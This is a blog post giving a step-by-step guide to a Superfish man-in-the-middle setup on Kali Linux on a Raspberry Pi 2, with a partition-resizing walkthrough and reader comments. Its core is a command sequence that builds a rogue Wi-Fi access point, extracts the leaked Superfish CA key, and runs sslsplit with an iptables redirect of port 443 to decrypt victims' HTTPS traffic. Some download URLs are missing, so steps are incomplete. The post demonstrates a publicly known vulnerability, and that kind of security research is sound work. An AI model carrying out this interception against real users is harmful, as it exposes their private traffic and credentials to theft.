Skip to content

SuperFish Exploit: Kali on Raspberry Pi 2

Robert Graham wrote a handy guide for a Superfish Exploit using Raspbian on a Raspberry Pi 2 (RP2). He mentioned wanting to run it on Kali instead so I decided to take that for a spin. Here are the steps. It took me about 20 minutes to get everything running.

A: Preparation of kali

  1. Download kali image (462.5MB) provided by @essobi
  2. Extract kali-0.1-rpi.img.xz – I used 7-zip
  3. MD5: 277ac5f1cc2321728b2e5dcbf51ac7ef 
    SHA-1: d45ddaf2b367ff5b153368df14b6a781cded09f6
  4. Write kali-0.1-rpi.img to SD – I used Win32DiskImager
  5. Insert the SD to RP2, connect network and power-up
  6. SSH to kali using default user:password (root:toor)

B: Configuration of kali. In brief, I changed the default password and added a user account. I gave the new account sudo rights, then I logged out and back in as the new user. After that I updated kali for pi (rpi-update) and changed the ssh keys.

  1. root@kali:~$ passwd
  2. root@kali:~$ adduser davi
  3. root@kali:~$ visudo
  4. davi@kali:~$ sudo apt-get install curl
  5. davi@kali:~$ sudo apt-get update && sudo apt-get upgrade
  6. davi@kali:~$ sudo wget -O /usr/bin/rpi-update
  7. davi@kali:~$ sudo chmod 755 /usr/bin/rpi-update
  8. davi@kali:~$ sudo rpi-update
  9. root@kali:~$ sudo dpkg-reconfigure openssh-server
  10. davi@kali:~$ sudo reboot

C: Configuration of network as Robert did – follow the elinux guide for details on how to edit the files.

  1. davi@kali:~$ sudo apt-get install hostapd udhcpd
  2. davi@kali:~$ sudo vi /etc/default/udhcpd
  3. davi@kali:~$ sudo ifconfig wlan0
  4. davi@kali:~$ sudo vi /etc/network/interfaces
  5. davi@kali:~$ sudo vi /etc/hostapd/hostapd.conf
  6. davi@kali:~$ sudo sh -c “echo 1 > /proc/sys/net/ipv4/ip_forward”
  7. davi@kali:~$ sudo vi /etc/sysctl.conf
  8. davi@kali:~$ sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
  9. davi@kali:~$ sudo iptables -A FORWARD -i eth0 -o wlan0 -m state –state RELATED,ESTABLISHED -j ACCEPT
  10. davi@kali:~$ sudo iptables -A FORWARD -i wlan0 -o eth0 -j ACCEPT
  11. davi@kali:~$ sudo sh -c “iptables-save > /etc/iptables.ipv4.nat”
  12. davi@kali:~$ sudo vi /etc/network/interfaces
  13. davi@kali:~$ sudo service hostapd start
  14. davi@kali:~$ sudo service udhcpd start
  15. davi@kali:~$ sudo update-rc.d hostapd enable
  16. davi@kali:~$ sudo update-rc.d udhcpd enable

For example if instead of a static address you wanted the interface to grab a dynamic one:

  • davi@kali:~$ sudo vi /etc/network/interfaces auto wlan0
  • iface wlan0 inet dhcp
    wpa-ssid "SSID"
    wpa-psk "passphrase"

D: Configuration for Superfish Exploit. These commands follow Robert’s. I downloaded his test.pem file, duplicated it into a certificate file and then used vi to remove the redundant bits.

  1. davi@kali:~$ wget
  2. davi@kali:~$ cp test.pem ca.crt
  3. davi@kali:~$ vi test.pem
  4. davi@kali:~$ vi ca.crt
  5. davi@kali:~$ openssl rsa -in test.pem -out ca.key
  6. davi@kali:~$ sudo apt-get install sslsplit
  7. davi@kali:~$ mkdir /var/log/sslsplit
  8. davi@kali:~$ sslsplit -D -l connections.log -S /var/log/sslsplit -k ca.key -c ca.crt ssl 8443 &
  9. davi@kali:~$ sudo iptables -t nat -A PREROUTING -p tcp –dport 443 -j REDIRECT –to-ports 8443

Obviously Robert did hard work figuring this out. I’ve just tested the basics to see what it would take to setup a Kali instance. If I test further or script it I’ll update this page. Also perhaps I should mention I have a couple hardware differences from Robert’s guide:

  • RP2. Cost: $35
  • 32GB SanDisk micro SD (which is FAR larger than necessary). Cost: $18
  • Edimax EW-7811Un wireless USB able to do “infrastructure mode”. Cost $10

Total cost: (re-purposed from other projects) $35 + $18 + $10 = $63
Total time: 20 minutes

Because I used such a large SD card, and the Kali image was so small, I also resized the partitions to make use of all that extra space.

Check starting use percentages:

  • davi@kali:~$ df -k
  • Filesystem     1K-blocks    Used Available Use% Mounted on
    rootfs           2896624 1664684   1065084  61% /
    /dev/root        2896624 1664684   1065084  61% /
    devtmpfs          470368       0    470368   0% /dev
    tmpfs              94936     460     94476   1% /run
    tmpfs               5120       0      5120   0% /run/lock
    tmpfs             189860       0    189860   0% /run/shm

Resize the partition

  1. davi@kali:~$ sudo fdisk /dev/mmcblk0
  2. type “p” (print partition table and NOTE START NUMBER FOR PARTITION 2)
  3. type “d” (delete partition)
  4. type “2” (second partition)
  5. type “n” (new partition)
  6. type “p” (primary partition)
  7. type “2” (second partition)
  8. hit “enter” to select default start number (SHOULD MATCH START NUMBER NOTED)
  9. hit “enter” to select default end number
  10. type “w” (write partition table)
  11. davi@kali:~$ sudo reboot
  12. davi@kali:~$ sudo resize2fs /dev/mmcblk0p2

Check finished use percentages:

  • davi@kali:~$ df -k
  • Filesystem     1K-blocks    Used Available Use% Mounted on
    rootfs          30549476 1668420  27590636   6% /
    /dev/root       30549476 1668420  27590636   6% /
    devtmpfs          470368       0    470368   0% /dev
    tmpfs              94936     464     94472   1% /run
    tmpfs               5120       0      5120   0% /run/lock
    tmpfs             189860       0    189860   0% /run/shm

Posted in Security.

3 Responses

Stay in touch with the conversation, subscribe to the RSS feed for comments on this post.

  1. Stu says

    After hours of finding a guide that I could follow easily – this is by far the best set of instructions for re-sizing partitions! Well for me at it was! Thank you very much for taking the time to write this guide – much appreciated.

  2. Abhishek says

    Thanks for the guide. I’m however stuck now to disable overscan for my Pi with Kali. as ther is no boot/config.txt I’m finding it very hard to use my complete screen. Can you please help me out here?

  3. Michael says

    The instructions are concise and work. Thanks.

Some HTML is OK

or, reply to this post via trackback.